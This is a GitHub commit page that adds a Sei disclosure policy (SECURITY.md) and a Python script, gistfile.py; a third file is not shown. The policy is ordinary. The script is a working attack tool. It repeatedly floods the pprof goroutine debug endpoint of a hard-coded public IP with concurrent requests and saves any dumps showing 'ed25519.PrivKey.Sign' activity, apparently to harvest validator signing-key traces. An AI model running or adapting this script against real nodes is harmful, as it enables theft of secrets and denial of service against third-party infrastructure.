Skip to content

Commit

Permalink
Add security.md
Browse files Browse the repository at this point in the history
  • Loading branch information
philipsu522 committed Sep 12, 2024
1 parent 8defdf4 commit 7eef844
Show file tree
Hide file tree
Showing 3 changed files with 25,865 additions and 0 deletions.
75 changes: 75 additions & 0 deletions SECURITY.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
# Security Policy

## Introduction

Security researchers are essential in identifying vulnerabilities that may impact the Sei ecosystem. If you have discovered a security vulnerability in the Sei chain or any repository managed by Sei, we encourage you to notify us using one of the methods outlined below.

### Guidelines for Responsible Vulnerability Testing and Reporting

1. **Refrain from testing vulnerabilities on our publicly accessible environments**, including but not limited to:

- Sei mainnet `pacific-1`
- Sei frontend
- Sei public testnets
- Sei testnet frontend

2. **Avoid reporting security vulnerabilities through public channels, including GitHub issues**

To privately report a security vulnerability, please choose one of the following options:

### 1. Email

Send your detailed vulnerability report to `protocol-eng@seinetwork.io`.

### 2. GitHub Private Vulnerability Reporting

Utilize [GitHub's Private Vulnerability Reporting](https://github.com/sei-protocol/sei-chain/security/advisories/new) for confidential disclosure.

## Submit Vulnerability Report

When reporting a vulnerability through either method, please include the following details to aid in our assessment:

- Type of vulnerability
- Description of the vulnerability
- Steps to reproduce the issue
- Impact of the issue
- Explanation on how an attacker could exploit it

## Vulnerability Disclosure Process

1. **Initial Report**: Submit the vulnerability via one of the above channels.
2. **Confirmation**: We will confirm receipt of your report within 48 hours.
3. **Assessment**: Our security team will evaluate the vulnerability and inform you of its severity and the estimated time frame for resolution.
4. **Resolution**: Once fixed, you will be contacted to verify the solution.
5. **Public Disclosure**: Details of the vulnerability may be publicly disclosed after ensuring it poses no further risk.

During the vulnerability disclosure process, we ask security researchers to keep vulnerabilities and communications around vulnerability submissions private and confidential until a patch is developed. Should a security issue require a network upgrade, additional time may be needed to raise a governance proposal and complete the upgrade.

During this time:

- Avoid exploiting any vulnerabilities you discover.
- Demonstrate good faith by not disrupting or degrading Sei's services.

## Feature request

For a feature request, e.g. module inclusion, please make a GitHub issue. Clearly state your use case and what value it will bring to other users or developers on Sei.

## Severity Characterization

| Severity | Description |
| ------------ | ----------------------------------------------------------------------- |
| **CRITICAL** | Immediate threat to critical systems (e.g., chain halts, funds at risk) |
| **HIGH** | Significant impact on major functionality |
| **MEDIUM** | Impacts minor features or exposes non-sensitive data |
| **LOW** | Minimal impact |

## Bug Bounty

Though we don't have an official bug bounty program, we generally offer rewards to security researchers who responsibly disclose vulnerabilities to us. Bounties are generally awarded for vulnerabilities classified as **high** or **critical** severity. Bounty amounts will be determined during the disclosure process, after the severity has been assessed.

> [!WARNING]
> Targeting our production environments will disqualify you from receiving any bounty.
## Feedback on this Policy

For recommendations on how to improve this policy, either submit a pull request or email `protocol-eng@seinetwork.io`.
35 changes: 35 additions & 0 deletions gistfile.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
import aiohttp
import asyncio

URL = "http://3.68.86.121:6060/debug/pprof/goroutine?debug=2"
KEYWORD = "ed25519.PrivKey.Sign"
OUTPUT_FILE = "responses.txt"
NUM_REQUESTS = 120
NUM_ITERATIONS = 100000


async def fetch(session, url):
async with session.get(url) as response:
#print("got_res")
return await response.text()


async def main():
async with aiohttp.ClientSession() as session:
x1= 0
for i in range(NUM_ITERATIONS):
tasks = [fetch(session, URL) for _ in range(NUM_REQUESTS)]
responses = await asyncio.gather(*tasks)

if any(KEYWORD in response for response in responses):
print("Found and saved responses containing the keyword 'ed25519.PrivKey.Sign'")
with open(OUTPUT_FILE+str(x1), 'a') as file:
for response in responses:
if KEYWORD in response:
file.write(response + "\n\n")
print("Found and saved responses containing the keyword 'ed25519.PrivKey.Sign'")
x1+=1


if __name__ == '__main__':
asyncio.run(main())
Loading

0 comments on commit 7eef844

Please sign in to comment.